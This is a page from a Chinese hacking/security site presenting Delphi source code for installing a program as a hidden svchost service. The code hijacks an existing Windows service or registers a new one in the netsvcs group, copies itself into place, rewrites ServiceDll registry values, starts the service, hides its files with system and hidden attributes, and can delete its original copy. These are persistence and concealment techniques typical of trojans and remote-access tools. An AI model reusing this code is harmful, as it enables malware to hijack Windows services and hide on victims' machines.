为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

替换和安装新svchost服务原代码

2009-7-13 12:18| 投稿: security

摘要: procedure Install(var DelMe:Boolean );stdcall ;varFileName: array[0..255] of Char;reg:TRegistry;hSCM...
procedure Install(var DelMe:Boolean );stdcall ;varFileName: array[0..255] of Char;reg:TRegistry;hSCM,hSCS: Cardinal ;ss : TServiceStatus;Args : PChar;s,s1:string;begin FillChar(FileName,SizeOf(FileName),0);GetModuleFileName(HInstance, FileName, SizeOf(FileName));s := Config.DIR+config.FileName;reg := TRegistry.Create;reg.RootKey := HKEY_LOCAL_MACHINE ;hSCM := OpenSCManager(nil,Nil,SC_MANAGER_ALL_ACCESS);if hSCM = 0 then Exit ;case Config.StartupMode ofRunAsServiceD : //'s':现存服务启动    begin      hSCS := OpenService(hSCM ,PChar(string(config.SrvName)), SERVICE_ALL_ACCESS);      if hSCS <> 0 then      begin        ControlService(hSCS ,SERVICE_CONTROL_STOP,ss);        ChangeServiceConfig(hSCS,                         SERVICE_WIN32_OWN_PROCESS or SERVICE_INTERACTIVE_PROCESS,                         SERVICE_AUTO_START,                         SERVICE_NO_CHANGE,                         nil,nil,nil,nil,nil,nil,nil);        if lstrcmpi(FileName,PChar(s)) <> 0 then        begin          Setfileattributes(PChar(s),FILE_ATTRIBUTE_NORMAL );          CopyFile(FileName, PChar(s),False) ; //copy到指定文件夹        end;        reg.OpenKey('SYSTEM\CurrentControlSet\Services\'+config.SrvName+'\',True) ;        SetPrivilege('SeBackupPrivilege');        RegSaveKey(reg.CurrentKey ,PChar(s+'.uns'),nil);        SetPrivilege('SeBackupPrivilege',False );        reg.CloseKey;        reg.OpenKey('SYSTEM\CurrentControlSet\Services\'+config.SrvName+          '\Parameters\',True) ;        reg.WriteData('ServiceDll',s[1],Length(s),REG_EXPAND_SZ );        StartService(hSCS , 0, Args);        CloseServiceHandle(hSCS);      end;    end;RunAsService : //新建服务启动    begin      InstallService(Config.SrvName,                     Config.DisplayName,                     '%SystemRoot%\System32\svchost.exe -k netsvcs',                     Config.Description); //安装服务      if lstrcmpi(FileName,PChar(s)) <> 0 then      begin        Setfileattributes(PChar(s),FILE_ATTRIBUTE_NORMAL );        CopyFile(FileName, PChar(s),False) ; //copy到指定文件夹      end;       reg.OpenKey('SYSTEM\CurrentControlSet\Services\'+config.SrvName+        '\Parameters\',True) ;      reg.WriteData('ServiceDll',s[1],Length(s),REG_EXPAND_SZ );      reg.CloseKey;      reg.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost',False );      SetPrivilege('SeBackupPrivilege');      RegSaveKey(reg.CurrentKey ,PChar(s+'.uns'),nil);      SetPrivilege('SeBackupPrivilege',False );      s1 := reg.ReadString('netsvcs');      s1 := config.SrvName+#0+s1;      reg.WriteData('netsvcs',s1[1],Length(s1),REG_MULTI_SZ );      hSCS := OpenService(hSCM ,PChar(string(config.SrvName)), SERVICE_ALL_ACCESS);      if hSCS <> 0 then      begin        StartService(hSCS , 0, Args);        CloseServiceHandle(hSCS);      end;    end;end;CloseServiceHandle(hSCM);reg.CloseKey ;reg.Free;Setfileattributes(PChar(s),FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN);Setfileattributes(PChar(s+'.uns'),FILE_ATTRIBUTE_SYSTEM+        FILE_ATTRIBUTE_HIDDEN);DelMe := Config.RMwIns;end;

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部